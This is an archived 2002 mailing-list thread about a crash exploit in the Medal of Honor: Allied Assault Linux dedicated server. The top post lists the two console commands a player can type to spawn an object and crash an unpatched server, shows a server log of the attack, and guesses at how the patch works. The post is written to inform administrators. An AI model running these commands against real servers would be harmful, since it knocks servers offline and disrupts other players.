[mohaa] Linux spawn fix?

[-SF-]Shockwave shockwave at clanshortfuse.com
Fri Dec 6 18:36:57 EST 2002 

Hello guys,

I know the details surrounding this problem.  I agree with Hazzie that it is
important for administrators to know what causes problems like this for the
same reasons he mentions.  The fix that is out there works, so a patched
server is immune to the attack I am about to outline.

The exploit is caused by the game engine allowing a player to spawn a new
object in the level.  By enabling the console, a player can type two
commands and cause the server to crash.  Here's one method that was
successfully used on my server before I patched it:

(1) Open the game console
(2) Type:  pushmenu lod_tool
(3) Type: lod_spawn models/vehicles/uboat.tik

Here is an excerpt from my server log from the attack I just mentioned:

clientCommand: WAFFEN-SS-16Th-THUG : 47 : lod spawn
models/vehicles/uboat.tik
Cvar Set2: lod tikiname models/vehicles/uboat.tik
Cvar Set2: lod tool 1
^~^~^ Add the following line to the * precache.scr map script:
cache models/vehicles/uboat.tik
TIKI InitTiki: could not find surface 'material4' in
'models/vehicles/uboat.tik'
(check referenced skb/skd files).
Cvar Set2: cg drawviewmodel 0
Cvar Set2: cg shadows 0
clientCommand: WAFFEN-SS-16Th-THUG : 48 : vÅ
client text ignored for WAFFEN-SS-16Th-THUG
WARNING: bad command byte for client 4
WARNING: bad command byte for client 4
WARNING: bad command byte for client 4
clientCommand: -=WB=- T-Dog : 1 : disconnect
broadcast: print " -=WB=- T-Dog disconnected\n"
Going to CS ZOMBIE for -=WB=- T-Dog

The patch works by obfuscating the commands used by players to spawn the
entities.  I'm not exactly sure how the patch actually works, but I believe
that it replaces the command references in the binary file fgameded.so with
random characters.  This keeps a malicious player from being able to access
these functions because there is no way to implement this exploit short of
guessing that the altered command name.  I hope this helps make this issue
clearer for everyone.

The entire situation makes me wonder.  Why would a game company allow
functionality like this to be accessed in a multiplayer setting from a
client in the first place?  I still can't believe that they actually allow
players to join a multiplayer game with cheats enabled!  This is how some of
the wall hacks and other cheats are implemented.  If anyone had stopped to
think and take advantage of the data gathered by dealing with cheaters in
other online games over the years, things like this would never be issues.
Hindsight may be 20/20, but a person actually has to look to get a clue.
Unfortunately, it appears that some people are still asleep at the switch.


Shockwave


----- Original Message -----
From: <richardnharrison at btinternet.com>
To: <mohaa at icculus.org>
Sent: Friday, December 06, 2002 5:53 AM
Subject: Re: [mohaa] Linux spawn fix?


> Unless you know someone who knows the bug your very unlikly to find out on
such a list as this. People usually dont pass on these sorts of bugs/cheats
on these lists. In my humble opinon they should be passed on. If they are
widly known about then people responsible for the game have more reason to
fix it. Sort of like security updates with OS's. The incentive being who
wants to play a game where the majority cheat. The downside being that the
few (and i am sure the minority rather than the majority get their kicks out
of cheating) would cause pain for some servers.
>
> Hazzie.
>
> >  from:    "Eduardo E. Silva" <esilva at silvex.com>
> >  date:    Fri, 06 Dec 2002 04:25:38
> >  to:      mohaa at icculus.org
> >  subject: Re: [mohaa] Linux spawn fix?
> >
> > How is that posible? I've already applied this to my server. My question
is
> > how did they do that ?
> >
> > Ed Silva
> > Silvex Consulting Inc.
> > (714) 504-6870 Cell
> >
> > Salsich, Luke said:
> > > hey all,
> > >
> > > I remember seeing a post a while back about a Linux fix for the issue
of
> > > users spawning objects into the map and crashing the server.
Unfortunately,
> > > I cant locate that fix on the net. Anybody have a link to the Linux
version
> > > of the fix?
> > >
> > > Thanks!
> > >
> > > Luke Salsich
> > >
> > >
> > >
> > >
> >
> >
> >

More information about the Mohaa mailing list